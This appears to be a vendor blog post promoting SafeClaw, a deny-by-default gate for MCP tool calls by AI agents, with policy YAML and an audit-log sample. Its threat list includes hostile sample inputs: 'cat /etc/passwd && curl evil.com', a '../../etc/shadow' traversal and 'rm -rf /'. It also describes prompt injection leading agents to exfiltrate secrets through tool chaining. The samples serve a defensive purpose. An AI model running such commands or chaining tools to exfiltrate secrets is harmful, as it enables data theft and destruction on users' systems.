2026-02-02 · Authensor

MCP Security: Securing Model Context Protocol Servers

Model Context Protocol (MCP) servers expose powerful tools to AI agents — file access, shell execution, database queries, API calls — making them high-value targets for exploitation through prompt injection, tool abuse, and unauthorized resource access. SafeClaw by Authensor intercepts every MCP tool invocation with deny-by-default gating, ensuring that only explicitly permitted tool calls execute regardless of what the LLM requests. Install it with npx @authensor/safeclaw and wrap your MCP server in minutes.

MCP Architecture and Attack Surface

An MCP server acts as a bridge between an AI model and system resources. The model sends JSON-RPC tool calls, the server executes them, and results flow back. The security problem: the model controls which tools are called and what arguments are passed, and a prompt injection can turn any MCP tool into a weapon.

┌────────────┐    JSON-RPC     ┌────────────┐     System
│  AI Model  │ ──────────────▶ │ MCP Server │ ──▶ Resources
│ (Claude/   │  tool_call:     │            │     (files,
│  OpenAI)   │  {name, args}   │            │     shell,
└────────────┘                 └────────────┘     network)
                                     │
                               ┌─────▼──────┐
                               │  SafeClaw   │
                               │  Gate       │
                               │  (deny-by-  │
                               │   default)  │
                               └─────────────┘

Threat Vectors Specific to MCP

  1. Tool argument injection — The model passes {"command": "cat /etc/passwd && curl evil.com"} to a shell_execute tool.
  2. Tool discovery abuse — The model enumerates available tools and calls ones not intended for its workflow.
  3. Resource path traversal — File tools receive ../../etc/shadow instead of legitimate workspace paths.
  4. Excessive tool chaining — The model calls 500 tools in rapid succession to overwhelm monitoring.
  5. Data exfiltration via tool results — Read a secret file, then pass its contents to an HTTP tool.

SafeClaw MCP Integration

SafeClaw provides a middleware layer that sits between the MCP server's tool registry and the execution engine:

# safeclaw-mcp.yaml
version: "1.0"
mcp:
  server: "workspace-tools"
  transport: "stdio"
rules:
  # Allow specific tools only
  - action: mcp_tool_call
    tool: "read_file"
    args:
      path: "src/**"
    decision: allow

- action: mcp_tool_call
tool: "write_file"
args:
path: "src/**"
decision: allow

- action: mcp_tool_call
tool: "execute_command"
args:
command: "npm test"
decision: allow

- action: mcp_tool_call
tool: "execute_command"
args:
command: "npm run build"
decision: allow

# Deny everything else (explicit, but also the default)
- action: mcp_tool_call
decision: deny

Argument Sanitization

SafeClaw validates tool arguments against policy rules before they reach the MCP server. The matching engine supports glob patterns, regex constraints, and argument type checking:

rules:
  - action: mcp_tool_call
    tool: "execute_command"
    args:
      command:
        pattern: "^(npm test|npm run build|npx jest .*)$"
        type: "regex"
    decision: allow

- action: mcp_tool_call
tool: "read_file"
args:
path:
pattern: "src/**"
deny_pattern: "*/.env" # Never allow .env files
decision: allow

This stops argument injection at the gate. The model can request npm test but cannot append && curl evil.com because the full argument string must match the regex.

Tool Whitelisting vs. Blacklisting

SafeClaw's deny-by-default design means you whitelist tools. This is critical for MCP because new tools can be added to the server without updating security policies — and with deny-by-default, any new tool is automatically blocked until explicitly permitted.

| Approach | New Tool Added | Result |
|----------|---------------|--------|
| Allow-by-default (blocklist) | Automatically available | Dangerous |
| Deny-by-default (SafeClaw) | Automatically blocked | Safe |

Audit Trail for MCP Operations

Every MCP tool call — allowed or denied — is recorded in SafeClaw's hash-chained audit log:

{
  "timestamp": "2026-02-13T14:30:22Z",
  "action": "mcp_tool_call",
  "tool": "execute_command",
  "args": {"command": "rm -rf /"},
  "decision": "deny",
  "policy_rule": "default_deny",
  "parent_hash": "sha256:abc123...",
  "entry_hash": "sha256:def456..."
}

This provides complete forensic coverage. SafeClaw's 446-test suite includes dedicated MCP integration tests covering tool discovery, argument edge cases, and transport-level (stdio and SSE) validation. The tool is MIT-licensed and provider-agnostic, working with both Claude and OpenAI MCP implementations.

Cross-References

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw